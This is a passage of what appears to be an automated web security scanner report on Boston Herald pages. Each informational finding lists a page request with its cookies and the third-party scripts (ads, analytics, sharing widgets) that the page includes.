<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.744. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.745. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.746. http://www.bostonherald.com/track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:44:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.747. http://www.bostonherald.com/track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:45:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.748. http://www.bostonherald.com/track/inside_track/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.749. http://www.bostonherald.com/track/inside_track/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view.bg?articleid=1312537&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:36:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.750. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.751. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.752. http://www.bostonherald.com/track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
